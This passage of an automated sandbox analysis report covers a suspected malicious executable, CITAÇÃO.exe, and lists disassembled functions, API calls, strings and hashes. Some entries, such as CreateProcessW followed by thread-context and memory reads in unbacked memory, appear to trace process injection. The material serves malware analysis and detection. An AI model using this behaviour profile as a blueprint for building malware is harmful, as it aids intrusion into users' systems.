                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                      • String ID: ,*H$4*H$@fI
                                                      • API String ID: 615853336-1459471987
                                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                      Function 03F73E98 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2147 3f73e98-3f73f46 call 3f718a8 2150 3f73f4d-3f73f73 call 3f74da8 CreateFileW 2147->2150 2153 3f73f75 2150->2153 2154 3f73f7a-3f73f8a 2150->2154 2155 3f740c5-3f740c9 2153->2155 2161 3f73f91-3f73fab VirtualAlloc 2154->2161 2162 3f73f8c 2154->2162 2156 3f7410b-3f7410e 2155->2156 2157 3f740cb-3f740cf 2155->2157 2163 3f74111-3f74118 2156->2163 2159 3f740d1-3f740d4 2157->2159 2160 3f740db-3f740df 2157->2160 2159->2160 2164 3f740e1-3f740eb 2160->2164 2165 3f740ef-3f740f3 2160->2165 2166 3f73fb2-3f73fc9 ReadFile 2161->2166 2167 3f73fad 2161->2167 2162->2155 2168 3f7416d-3f74182 2163->2168 2169 3f7411a-3f74125 2163->2169 2164->2165 2172 3f740f5-3f740ff 2165->2172 2173 3f74103 2165->2173 2174 3f73fd0-3f74010 VirtualAlloc 2166->2174 2175 3f73fcb 2166->2175 2167->2155 2170 3f74184-3f7418f VirtualFree 2168->2170 2171 3f74192-3f7419a 2168->2171 2176 3f74127 2169->2176 2177 3f74129-3f74135 2169->2177 2170->2171 2172->2173 2173->2156 2180 3f74017-3f74032 call 3f74ff8 2174->2180 2181 3f74012 2174->2181 2175->2155 2176->2168 2178 3f74137-3f74147 2177->2178 2179 3f74149-3f74155 2177->2179 2183 3f7416b 2178->2183 2184 3f74157-3f74160 2179->2184 2185 3f74162-3f74168 2179->2185 2187 3f7403d-3f74047 2180->2187 2181->2155 2183->2163 2184->2183 2185->2183 2188 3f7407a-3f7408e call 3f74e08 2187->2188 2189 3f74049-3f74078 call 3f74ff8 2187->2189 2195 3f74092-3f74096 2188->2195 2196 3f74090 2188->2196 2189->2187 2197 3f740a2-3f740a6 2195->2197 2198 3f74098-3f7409c CloseHandle 2195->2198 2196->2155 2199 3f740b6-3f740bf 2197->2199 2200 3f740a8-3f740b3 VirtualFree 2197->2200 2198->2197 2199->2150 2199->2155 2200->2199
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F73F69
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F7418F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 83549b58a85267982f3420633032ef4428f68d1e7337638c041cbfbffc337081
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: F2A13875E00209EBDB14DFA5C888BEEBBB5FF48304F24819AE511BB290D7759A41CF91
                                                      Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2201 4102b0-4102c5 SHGetMalloc 2202 4102cb-4102da SHGetDesktopFolder 2201->2202 2203 425dfd-425e0e call 433244 2201->2203 2205 4102e0-41031a call 412fba 2202->2205 2206 41036b-410379 2202->2206 2213 410360-410368 2205->2213 2214 41031c-410331 SHGetPathFromIDListW 2205->2214 2206->2203 2211 41037f-410384 2206->2211 2213->2206 2215 410351-41035d 2214->2215 2216 410333-41034a call 412fba 2214->2216 2215->2213 2216->2215
                                                      APIs
                                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • _wcsncpy.LIBCMT ref: 004102ED
                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • _wcsncpy.LIBCMT ref: 00410340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                      • String ID: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3170942423-1095687430
                                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                      Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2219 401250-40125c 2220 401262-401293 call 412f40 call 401b80 2219->2220 2221 4012e8-4012ed 2219->2221 2226 4012d1-4012e2 KillTimer SetTimer 2220->2226 2227 401295-4012b5 2220->2227 2226->2221 2228 4012bb-4012bf 2227->2228 2229 4272ec-4272f2 2227->2229 2230 4012c5-4012cb 2228->2230 2231 42733f-427346 2228->2231 2232 4272f4-427315 Shell_NotifyIconW 2229->2232 2233 42731a-42733a Shell_NotifyIconW 2229->2233 2230->2226 2234 427393-4273b4 Shell_NotifyIconW 2230->2234 2235 427348-427369 Shell_NotifyIconW 2231->2235 2236 42736e-42738e Shell_NotifyIconW 2231->2236 2232->2226 2233->2226 2234->2226 2235->2226 2236->2226
                                                      APIs
                                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 3300667738-0
                                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                      Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpen
                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                      • API String ID: 1586453840-614718249
                                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                      Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                      Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$ClearErrorLast
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 2487901850-572801152
                                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                      Function 03F73C58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 03F73B48: Sleep.KERNELBASE(000001F4), ref: 03F73B59
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F73D8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: Z8ZR7JZ8YC4AWO1JW6BX2
                                                      • API String ID: 2694422964-2825875535
                                                      • Opcode ID: bfa8c10d76bba209b72f35f54b9762f8fe1e44953a6df82f1cf2b3d8987f5b61
                                                      • Instruction ID: d8d1d4d7a33cf989be4d462e82ffb3c7adffaab3a5cc68305a07debe63f78a62
                                                      • Opcode Fuzzy Hash: bfa8c10d76bba209b72f35f54b9762f8fe1e44953a6df82f1cf2b3d8987f5b61
                                                      • Instruction Fuzzy Hash: 9851B634D1424CEBEF11DBA4C854BEEBB79AF59300F04419AE148BB2C1D7B91B49CBA5
                                                      Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • _wcsncpy.LIBCMT ref: 00401C41
                                                      • _wcscpy.LIBCMT ref: 00401C5D
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                      • String ID: Line:
                                                      • API String ID: 1874344091-1585850449
                                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                      Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Close$OpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 1607946009-824357125
                                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                      Function 03F72B48 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F73303
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F73399
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F733BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1781368925.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3f71000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction ID: c2675b8c8df760f75585207a5886ee28015602c3c44e6f26898b823e42ea149e
                                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction Fuzzy Hash: BF62FA74A142589BEB24CFA4CC50BDEB376EF58300F1091AAD10DEB390E7769E85CB59
                                                      Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                      Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                      Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                      • _free.LIBCMT ref: 004295A0
                                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
